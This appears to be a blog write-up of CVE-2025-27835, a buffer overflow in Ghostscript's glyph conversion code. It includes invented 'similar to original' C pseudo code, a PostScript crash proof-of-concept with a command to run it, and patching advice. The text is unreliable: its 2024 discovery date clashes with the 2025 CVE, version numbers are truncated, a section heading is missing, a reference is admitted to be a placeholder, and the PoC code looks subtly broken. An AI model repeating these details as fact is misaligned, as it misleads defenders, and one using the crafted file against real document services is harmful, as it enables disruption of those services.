CVE-2025-27835 - Buffer Overflow in Ghostscript’s Glyph Conversion (psi/zbfont.c) – Technical Guide with Exploit Details

On March 12, 2024, a new vulnerability was identified in Artifex Ghostscript before version 10.05.. Tracked as CVE-2025-27835, this security flaw is a buffer overflow that triggers during the conversion of *glyphs to Unicode values* in the source file psi/zbfont.c.

This vulnerability could allow attackers to execute arbitrary code when processing malicious input files — typically PostScript or PDF files designed to trigger the overflow.

This post breaks down the root cause, shares simple proof-of-concept code, and gives tips for protecting your systems.

1. What is Ghostscript?

Artifex Ghostscript is a widely used interpreter for the PostScript language and for PDF files. It is integrated into many desktop tools, PDF viewers, and even online platforms.

Impact: Potential remote code execution (RCE) via buffer overflow

- Component: Glyph-to-Unicode conversion (psi/zbfont.c)

Affected versions: All before 10.05.

- Fixed in: Ghostscript 10.05. Release Notes

References:

- Artifex Ghostscript Security Advisories
- CVE-2025-27835 NVD Entry (placeholder, as actual page may not exist yet)

3. Technical Explanation: Why the Overflow Happens

The vulnerability is found in the way zbfont.c converts glyph names to Unicode. The code did not validate buffer lengths correctly.

Simplified Vulnerable Code (zbfont.c)

// Pseudo code similar to original, for illustration.
char buffer[32];
void convert_glyph(const char *src) {
    // Unsafe copy - does not check max size!
    strcpy(buffer, src);   // <-- Buffer overflow here if src >31 bytes
    // ... process buffer ...
}

If an attacker crafts a glyph name longer than 31 bytes, it will overwrite memory adjacent to buffer. That could let them control program flow — especially in older systems compiled without stack protections.

4. Proof of Concept: Triggering the Overflow

Attackers can exploit this by submitting a PostScript or PDF file with a malicious glyph table.

Here is a minimal PostScript snippet (exploit.ps) to crash Ghostscript

%!  
% Create a font with a very large glyph name.
10 dict begin
  /Encoding 256 array def
   1 255 {Encoding exch /.longglyphnamelongglyphnamelongglyphname exch put} for
  /FontType 1 def
  /FontName /ExploitFont def
end
/ExploitFont exch definefont pop

% Try to use the glyph (triggers conversion)
newpath 100 100 moveto (A) show
showpage

Explanation:
The glyph name 'longglyphnamelongglyphnamelongglyphname' is much longer than 32 bytes, so when Ghostscript reads it and converts it to Unicode, buffer overflow happens inside zbfont.c.

5. Real-World Exploitation: From Crash to Code Execution

In most modern systems, exploitation is hard due to stack canaries, ASLR, and other mitigations. But in some setups or older OSes, attackers can:

Create a PostScript or PDF file with malicious glyph entries.

- Send or upload it to a parser or print service (like a web-to-PDF server, mail preview, or even command-line process).

Example shell invocation

ghostscript -dSAFER -sDEVICE=png16m -sOutputFile=out.png exploit.ps

In vulnerable Ghostscript versions, this will likely crash or cause memory corruption.

6. Fix & Detection

Official Fix:
The strcpy has been replaced with a safe function (like strncpy or memcpy with boundary checks) in Ghostscript 10.05..

Mitigation Steps

- Update immediately: Download and install Ghostscript 10.05. or newer: Downloads
- Scan your system: Look for old installations in /usr/bin/gs or /usr/local/bin/gs.
- Restrict input: Run Ghostscript with the -dSAFER option, but note this won’t prevent memory corruption from this bug.
- Monitor crash logs: Unexplained Ghostscript crashes with crafted PDFs/PS may signal attack attempts.

7. Links and References

- Ghostscript Security Updates
- Release Notes 10.05.
- CVE-2025-27835 NVD Record
- Ghostscript GitHub – Fix Commit

8. Summary

CVE-2025-27835 is a serious overflow flaw in Ghostscript’s font code. Attackers can abuse it simply by sending a crafted PostScript or PDF file. While direct code execution is likely mitigated on newer systems, *denials of service* and further exploits in chained attacks are possible.

Prevention is simple: Always keep Ghostscript up-to-date. Scan for legacy installations in shared host environments (like print servers or PDF generation services), and consider sandboxing or containerizing risky workloads.

Stay safe – and remember, one outdated parsing tool can put your whole workflow at risk.


> *Did you find this useful? Let us know, and subscribe for more practical vulnerability breakdowns!*

Timeline

Published on: 03/25/2025 21:15:43 UTC
Last modified on: 03/27/2025 16:45:46 UTC